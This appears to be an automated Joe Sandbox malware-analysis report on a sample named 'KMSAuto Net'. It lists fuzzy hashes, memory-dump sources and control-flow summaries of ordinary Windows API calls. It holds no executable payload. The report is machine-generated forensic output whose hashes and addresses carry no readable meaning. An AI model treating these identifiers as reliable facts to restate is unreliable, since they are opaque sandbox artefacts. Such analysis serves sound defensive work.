                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: db2813f2793a401f57ef1f057e374387a95f5094451eb2922e501202bfc2a8db
                                                                    • Instruction ID: 8f3c2584de6225e94368c1838399da06e760d8afd7a5d8bc2a22460a55e52d80
                                                                    • Opcode Fuzzy Hash: db2813f2793a401f57ef1f057e374387a95f5094451eb2922e501202bfc2a8db
                                                                    • Instruction Fuzzy Hash: 206149726087118FC318DF49D48494AF3E1FFC8328F168A6DEA885B361D771E959CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4f439fddda1cff378aa7405ded2eec4dbc5bcc2cb1461a5db01c36286a516767
                                                                    • Instruction ID: 61ec7da891ac379a079c4cada1c54a3c951e7f08e9cfa06a59bad265c7ae26eb
                                                                    • Opcode Fuzzy Hash: 4f439fddda1cff378aa7405ded2eec4dbc5bcc2cb1461a5db01c36286a516767
                                                                    • Instruction Fuzzy Hash: 7A61735510DBD59AC326CF3988901A5FFF1AE67001708879DE8E543F86C268F6A8CBF1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 799d1115dc2863312a6815c420eb3dd35bfefad0a364759f5b8cc872ca117984
                                                                    • Instruction ID: 8458d4d4d269ca468090b602944776c6948db0dcb526dbd5a8198f63e6d3541e
                                                                    • Opcode Fuzzy Hash: 799d1115dc2863312a6815c420eb3dd35bfefad0a364759f5b8cc872ca117984
                                                                    • Instruction Fuzzy Hash: E841D471B50A200AB318CF268C841A62BD3DBCA386795C23CC561C66DDDEBDC057C6A8
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: da58cda1e4a3e41df5831c516bb8b01ca1fa6d25def6b220089d14d8ce8e8937
                                                                    • Instruction ID: 727ecf8a08318eff18c6e3e90a6dd58bf46e21329c404715613e8378649f1e35
                                                                    • Opcode Fuzzy Hash: da58cda1e4a3e41df5831c516bb8b01ca1fa6d25def6b220089d14d8ce8e8937
                                                                    • Instruction Fuzzy Hash: F3312B72B087A646E310AE1E8C40135BB93EFC1111F59C7BDD8944BB4AE935A592C7B0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                    • Instruction ID: f83d5bf9d57220e134c0efa5b8faa546837d28f5af661a832ae9dcaf1d96617f
                                                                    • Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
                                                                    • Instruction Fuzzy Hash: 67418061814B9653EB234F7CC882272B320BFAB244F00D76AFDD1B9962FB326544A651
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe93bfcd9158faa8c00da4e9f32d0b20577b1cbc1f0c38ad72f46926000780c7
                                                                    • Instruction ID: b03d9a9b39a7da2c66e1161dc44964ad18036ac87affdce31a534004a2cc065d
                                                                    • Opcode Fuzzy Hash: fe93bfcd9158faa8c00da4e9f32d0b20577b1cbc1f0c38ad72f46926000780c7
                                                                    • Instruction Fuzzy Hash: 74111F7E3B0D0607A75C8769AC73ABD21C1E3843087C8A53CF69BC62D1EE6D9495C10D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d500e99f8a94672710fdab3da84f4ff88beaa55a68f080d6b94a73964fb8a436
                                                                    • Instruction ID: 648a44d9ab036f68ae4d78b5d0b44b46e6810078e73c9c450a1b1abfd4f036d5
                                                                    • Opcode Fuzzy Hash: d500e99f8a94672710fdab3da84f4ff88beaa55a68f080d6b94a73964fb8a436
                                                                    • Instruction Fuzzy Hash: 1E21F5329006355BCB02CE6EE8845A7F3D1FBC436AF17473AED8567690D638B814C6E0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000003.249638481.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_3_46b0000_ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                    • Instruction ID: 3446dfe45843fe060c6729c922912dd58e8656c16347771fe04eb95af6f075f9
                                                                    • Opcode Fuzzy Hash: d88b4545622fc2f48369f3988b55fed1d0241348448e0d26e09a3dd7181b3030
                                                                    • Instruction Fuzzy Hash: 492137725144355BC305DF2DE888677B3E1FFD4319F978A2AD9878B281E628F405DA90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Execution Graph

                                                                    Execution Coverage:10%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0%
                                                                    Total number of Nodes:308
                                                                    Total number of Limit Nodes:22
execution_graph: rendered graph data (node identifiers and edges) omitted; the listing is truncated at its end. API calls resolved in the graph: LoadLibraryExW, GetModuleHandleW, SetWindowLongW, KiUserCallbackDispatcher, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, GetFocus, DrawTextExW.
35225->35207 35226->35225 35228 51551f7 DrawTextExW 35226->35228 35229 5155208 DrawTextExW 35226->35229 35227 51547ac 35227->35207 35228->35227 35229->35227 35231 5155208 35230->35231 35237 5153b6c 35231->35237 35235 5153b6c DrawTextExW 35234->35235 35236 5155225 35235->35236 35236->35215 35238 5155240 DrawTextExW 35237->35238 35240 5155225 35238->35240 35240->35215 35241 515a408 35244 515a538 35241->35244 35245 515a559 35244->35245 35247 515a590 3 API calls 35245->35247 35248 515a583 3 API calls 35245->35248 35246 515a424 35247->35246 35248->35246 35249 125feb8 35250 125ff11 35249->35250 35251 1256874 2 API calls 35250->35251 35252 125ff4a 35251->35252 35257 125db58 35258 125dbc0 CreateWindowExW 35257->35258 35260 125dc7c 35258->35260 35261 1256c98 DuplicateHandle 35262 1256d2e 35261->35262

                                                                    Control-flow Graph (rendered graph omitted; the executed/not-executed colouring is not recoverable from the text)
                                                                    • Basic blocks: 1256a61-1256c1f
                                                                    • API calls: GetCurrentProcess (1256a61-1256ae1), GetCurrentThread (1256aea-1256b1e), GetCurrentProcess (1256b27-1256b5b), GetCurrentThreadId (1256b85-1256bb4)
                                                                    • Internal calls: the call at 1256b7f is resolved to 1257000, 1257010 or 1256c20
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 01256AD0
                                                                    • GetCurrentThread.KERNEL32 ref: 01256B0D
                                                                    • GetCurrentProcess.KERNEL32 ref: 01256B4A
                                                                    • GetCurrentThreadId.KERNEL32 ref: 01256BA3
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: a459e0f52ee480e9f8bb6e7f57e2238004bded815c6bf17bd20e52b276608ab7
                                                                    • Instruction ID: af760960fbc8024ec6001827b6732a2aa411bd46b797cc5e0f797ef8ea0bf85f
                                                                    • Opcode Fuzzy Hash: a459e0f52ee480e9f8bb6e7f57e2238004bded815c6bf17bd20e52b276608ab7
                                                                    • Instruction Fuzzy Hash: 025184B49002898FDB14CFAAD988BDEBFF1EF88304F248459E409B7250D775A884CF65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph (rendered graph omitted; the executed/not-executed colouring is not recoverable from the text)
                                                                    • Basic blocks: 1256a70-1256c1f (overlapping entry of the 1256a61 function above)
                                                                    • API calls: GetCurrentProcess (1256a70-1256ae1), GetCurrentThread (1256aea-1256b1e), GetCurrentProcess (1256b27-1256b5b), GetCurrentThreadId (1256b85-1256bb4)
                                                                    • Internal calls: the call at 1256b7f is resolved to 1257000, 1257010 or 1256c20
                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32 ref: 01256AD0
                                                                    • GetCurrentThread.KERNEL32 ref: 01256B0D
                                                                    • GetCurrentProcess.KERNEL32 ref: 01256B4A
                                                                    • GetCurrentThreadId.KERNEL32 ref: 01256BA3
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: Current$ProcessThread
                                                                    • String ID:
                                                                    • API String ID: 2063062207-0
                                                                    • Opcode ID: d7f415c631fdfe7cbd485d6d20d667ae95535967c604f7904ac9950733e1c181
                                                                    • Instruction ID: 0f5ca3f0d8c89a303bba95d69fb7cd22b2326cb17243f72df698896b4dec6f89
                                                                    • Opcode Fuzzy Hash: d7f415c631fdfe7cbd485d6d20d667ae95535967c604f7904ac9950733e1c181
                                                                    • Instruction Fuzzy Hash: B95165B49002498FDB14DFAAD988B9EBBF1FF48304F648459E419B7250D774A884CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph (rendered graph omitted; the executed/not-executed colouring is not recoverable from the text)
                                                                    • Basic blocks: 125ba98-125bd18
                                                                    • API calls: GetModuleHandleW (125bcd0-125bcfb)
                                                                    • Internal calls: 125af60 (125ba98-125babd); 125bd21 or 125bd30 (at 125bac5); 125af6c (125bb50-125bb57); 125af7c (125bb98-125bb9a); 1259800 and 125af8c (125bbbe-125bbce)
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0125BCEE
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 56dc87714abeee999b418e4270878ee26ae11028c53a403341e63c2492ba2894
                                                                    • Instruction ID: a773ac23f2379626330ae870c1c46625a73cecf4a848c18d7f09ff32db194029
                                                                    • Opcode Fuzzy Hash: 56dc87714abeee999b418e4270878ee26ae11028c53a403341e63c2492ba2894
                                                                    • Instruction Fuzzy Hash: 92814670A10B068FD764DF2AC48576ABBF2FF88304F108A2AD986D7A50D775E805CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph (rendered graph omitted; the executed/not-executed colouring is not recoverable from the text)
                                                                    • Basic blocks: 5159b00-5159ce1
                                                                    • API calls: KiUserCallbackDispatcher (5159c1b-5159c5e)
                                                                    • Internal calls: 5159cff (5159b6e-5159bb4); 51585ec (5159bb6-5159bc0); 5158558 (5159c78-5159c90)
                                                                    APIs
                                                                    • KiUserCallbackDispatcher.NTDLL(00000014,?,?,03C6608C,02CAA8B8,?,00000000), ref: 05159C5E
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.518791870.0000000005150000.00000040.00000800.00020000.00000000.sdmp, Offset: 05150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_5150000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: CallbackDispatcherUser
                                                                    • String ID:
                                                                    • API String ID: 2492992576-0
                                                                    • Opcode ID: 466b1bb9cd3b03761ce74f1ba5c2a063d0e9f1df851a9e7366cfbcd83c3662ba
                                                                    • Instruction ID: d745325368b7b446961d23815ca68f7506f4839b06ee24af6ec0dad706e30c18
                                                                    • Opcode Fuzzy Hash: 466b1bb9cd3b03761ce74f1ba5c2a063d0e9f1df851a9e7366cfbcd83c3662ba
                                                                    • Instruction Fuzzy Hash: 3E717C74A11208EFCB55DF69D884DAEBBB6FF48624F114498F912AB361DB31EC81CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph (rendered graph omitted; the executed/not-executed colouring is not recoverable from the text)
                                                                    • Basic blocks: 125db4c-125dcc9; the final block 125dcc9 loops to itself
                                                                    • API calls: CreateWindowExW (125dc1b-125dc7a)
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0125DC6A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: e20b852575e3aa89b24b1210fe3f25245874de111722d43f6ec8cf409bcbb772
                                                                    • Instruction ID: 0ffa33114d8536c3783dab7fbf4de41ccafa4dc095bc51db9bca96d7a67f99cb
                                                                    • Opcode Fuzzy Hash: e20b852575e3aa89b24b1210fe3f25245874de111722d43f6ec8cf409bcbb772
                                                                    • Instruction Fuzzy Hash: 4651C1B5D10309DFDB14CF99C984ADDBFB6BF48314F24862AE819AB210D7B49885CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph (rendered graph omitted; the executed/not-executed colouring is not recoverable from the text)
                                                                    • Basic blocks: 125db58-125dcc9 (overlapping entry of the 125db4c function above); the final block 125dcc9 loops to itself
                                                                    • API calls: CreateWindowExW (125dbdb-125dc7a)
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0125DC6A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: a64f9d1d1bdc0fde66082e91d1fc41e69fe9b7e3842dffe29fed06c0fcfb2801
                                                                    • Instruction ID: 5d4e8d00a05f2f0045d5c0ba62c97a5886ae3ad60c3003b2d06f3a6ca4ad6e85
                                                                    • Opcode Fuzzy Hash: a64f9d1d1bdc0fde66082e91d1fc41e69fe9b7e3842dffe29fed06c0fcfb2801
                                                                    • Instruction Fuzzy Hash: 5C41C2B1D10309DFDB14CF9AC984ADEBFB6BF48314F24862AE819AB210D7759845CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph (rendered graph omitted; the executed/not-executed colouring is not recoverable from the text)
                                                                    • Basic blocks: 5153b6c-515530a
                                                                    • API calls: DrawTextExW (51552ab-51552e4)
                                                                    APIs
                                                                    • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05155225,?,?), ref: 051552D7
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.518791870.0000000005150000.00000040.00000800.00020000.00000000.sdmp, Offset: 05150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_5150000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: DrawText
                                                                    • String ID:
                                                                    • API String ID: 2175133113-0
                                                                    • Opcode ID: 102391b3830285d907bbc0bcbd78d74f1aa35d6af53642bc0e0ea182d2a0c771
                                                                    • Instruction ID: 7896e96c3aac4a185efbf6831a83881b934a9a07ce6d5779fc3855be115f3cc6
                                                                    • Opcode Fuzzy Hash: 102391b3830285d907bbc0bcbd78d74f1aa35d6af53642bc0e0ea182d2a0c771
                                                                    • Instruction Fuzzy Hash: A531C3B5900209DFDB10CF9AD884ADEBBF6FB48324F55842EE819A7310D775A944CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph (rendered graph omitted; the executed/not-executed colouring is not recoverable from the text)
                                                                    • Basic blocks: 5155238-515530a (overlapping entry of the 5153b6c function above)
                                                                    • API calls: DrawTextExW (51552ab-51552e4)
                                                                    APIs
                                                                    • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,05155225,?,?), ref: 051552D7
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.518791870.0000000005150000.00000040.00000800.00020000.00000000.sdmp, Offset: 05150000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_5150000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: DrawText
                                                                    • String ID:
                                                                    • API String ID: 2175133113-0
                                                                    • Opcode ID: 99933e4d16769d6f8c6c192903dd8bce702274893e4467ea59857398cdee7105
                                                                    • Instruction ID: b8e2a146a02e6b8a85f9dae1d17f43cd988d13567e10f48160c00c87a3d49cde
                                                                    • Opcode Fuzzy Hash: 99933e4d16769d6f8c6c192903dd8bce702274893e4467ea59857398cdee7105
                                                                    • Instruction Fuzzy Hash: 7C31E2B5900209DFDB10CF9AD9846DEBBF6BF58324F54842AE815A7310D374A945CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph (rendered graph omitted; the executed/not-executed colouring is not recoverable from the text)
                                                                    • Basic blocks: 1256c90-1256d52
                                                                    • API calls: DuplicateHandle (1256c90-1256d2c)
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01256D1F
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 19ea43860c0bb30fc3cf0d1e24bb4e89915255379a674e61e416c9871d7c1415
                                                                    • Instruction ID: fb46ceff81a2c40d3f8b93e697c5059ae0edb94dcd493eebaf562cc4a9fa5b70
                                                                    • Opcode Fuzzy Hash: 19ea43860c0bb30fc3cf0d1e24bb4e89915255379a674e61e416c9871d7c1415
                                                                    • Instruction Fuzzy Hash: A42114B69002099FDB10CFAAD984ADEBFF5FB48324F14841AE954A3310C378A944CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph (rendered graph omitted; the executed/not-executed colouring is not recoverable from the text)
                                                                    • Basic blocks: 1256c98-1256d52 (overlapping entry of the 1256c90 function above)
                                                                    • API calls: DuplicateHandle (1256c98-1256d2c)
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01256D1F
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 9f319ca73d1f75334fba789b0ee17d6169edc5dff3b838864ad28d285f5269cb
                                                                    • Instruction ID: 87c16d9c88778dc4806904e48a5c3bef75c57bebcd788f472647f9a7f128d766
                                                                    • Opcode Fuzzy Hash: 9f319ca73d1f75334fba789b0ee17d6169edc5dff3b838864ad28d285f5269cb
                                                                    • Instruction Fuzzy Hash: C521F3B59002099FDB10CFAAD984ADEBFF9FB48324F14841AE914A3310D378A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 3282 125bf08-125bf50 3284 125bf52-125bf55 3282->3284 3285 125bf58-125bf60 3282->3285 3284->3285 3286 125bf63-125bf87 LoadLibraryExW 3285->3286 3287 125bf90-125bfad 3286->3287 3288 125bf89-125bf8f 3286->3288 3288->3287
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0125BD69,00000800,00000000,00000000), ref: 0125BF7A
Memory Dump Source
• Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: a43e1dd02dfdceafce87237b5b1de231a91fd86fc2f1edcf3b3a5bbd29966a3c
• Instruction ID: 67ed032cb3c21903f6449c0016363ccc889e2934c0c745e55d04eb1862efdadb
• Opcode Fuzzy Hash: a43e1dd02dfdceafce87237b5b1de231a91fd86fc2f1edcf3b3a5bbd29966a3c
• Instruction Fuzzy Hash: D72147B6C003098FDB10CFAAC884ADEFBF5EB48314F14856EE419A7600C375A545CFA4
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 3291 125afb8-125bf50 3293 125bf52-125bf55 3291->3293 3294 125bf58-125bf87 LoadLibraryExW 3291->3294 3293->3294 3296 125bf90-125bfad 3294->3296 3297 125bf89-125bf8f 3294->3297 3297->3296
APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0125BD69,00000800,00000000,00000000), ref: 0125BF7A
Memory Dump Source
• Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: d34deb334edb65ed7b78de524f564255cd5d403f996ba7309a1c37aad7607b83
• Instruction ID: ab798e413e7fa429ba1f1e7c0d829ef0b84177a8fe1337a4a88c90c46d2c8390
• Opcode Fuzzy Hash: d34deb334edb65ed7b78de524f564255cd5d403f996ba7309a1c37aad7607b83
• Instruction Fuzzy Hash: 9B1117B69002098FDB10CF9AD884BDEFBF5EB48314F14842EE919A7200C375A945CFA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 3300 125bc88-125bcc8 3301 125bcd0-125bcfb GetModuleHandleW 3300->3301 3302 125bcca-125bccd 3300->3302 3303 125bd04-125bd18 3301->3303 3304 125bcfd-125bd03 3301->3304 3302->3301 3304->3303
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 0125BCEE
Memory Dump Source
• Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: cf648f1c399720d1a0197f264bf6068225a0aa19510bf1d18023cce78b449725
• Instruction ID: f341dcede12540cf16958c40f54a6e0a6e121dae5c99bb99dd8af8ca39361312
• Opcode Fuzzy Hash: cf648f1c399720d1a0197f264bf6068225a0aa19510bf1d18023cce78b449725
• Instruction Fuzzy Hash: 981113B6C002498FDB10CF9AC884ADEFBF5AB48324F14855AD819A7200C379A545CFA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 3310 125dda0-125de0a SetWindowLongW 3311 125de13-125de27 3310->3311 3312 125de0c-125de12 3310->3312 3312->3311
APIs
• SetWindowLongW.USER32(?,?,?), ref: 0125DDFD
Memory Dump Source
• Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
Similarity
• API ID: LongWindow
• String ID:
• API String ID: 1378638983-0
• Opcode ID: f95f9e00c4eeb3eaa4e589da8922819885da2c625bd0455fb1079a9ce5e1aa56
• Instruction ID: dee3a90b70b11f8723c9013059f5282dd66b73db8875567661612c021df5c5e2
• Opcode Fuzzy Hash: f95f9e00c4eeb3eaa4e589da8922819885da2c625bd0455fb1079a9ce5e1aa56
• Instruction Fuzzy Hash: 971115B59002498FDB20CF9AD984BDEFBF8EB48324F20855AD914A7300C374A944CFA1
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 3306 125dd99-125de0a SetWindowLongW 3307 125de13-125de27 3306->3307 3308 125de0c-125de12 3306->3308 3308->3307
APIs
• SetWindowLongW.USER32(?,?,?), ref: 0125DDFD
Memory Dump Source
• Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
Similarity
• API ID: LongWindow
• String ID:
• API String ID: 1378638983-0
• Opcode ID: eaa1977621de9ebc28024b7c73bd21cc6a70891a920bdc2bb842311d244e33d8
• Instruction ID: 446f08341a29b25a3c89619204aa2f746f5db24368e8fb2cb9e0951a63b3dc69
• Opcode Fuzzy Hash: eaa1977621de9ebc28024b7c73bd21cc6a70891a920bdc2bb842311d244e33d8
• Instruction Fuzzy Hash: 1F1106B59002098FDB10DF99D985BDEBBF4EB48324F14855AD914B7300C378A944CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0125BD69,00000800,00000000,00000000), ref: 0125BF7A
Memory Dump Source
• Source File: 00000002.00000002.515666719.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_1250000_KMSAuto Net.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: ff8d7a9edfbfd749208382cf2a4a8fca8cf1e7eb07898dd11245126b8b2cdfc4
• Instruction ID: 15ac2d3de1b3d738dbbf9b93b40c268ddcd8dea1170c7424370a7d4d56e3dde4
• Opcode Fuzzy Hash: ff8d7a9edfbfd749208382cf2a4a8fca8cf1e7eb07898dd11245126b8b2cdfc4
• Instruction Fuzzy Hash: 1C01FD768043018FEB208BADD8443DABBF5AF94324F10801EE514E7651C37A9444CF91
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000002.00000002.515335372.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
Joe Sandbox IDA Plugin
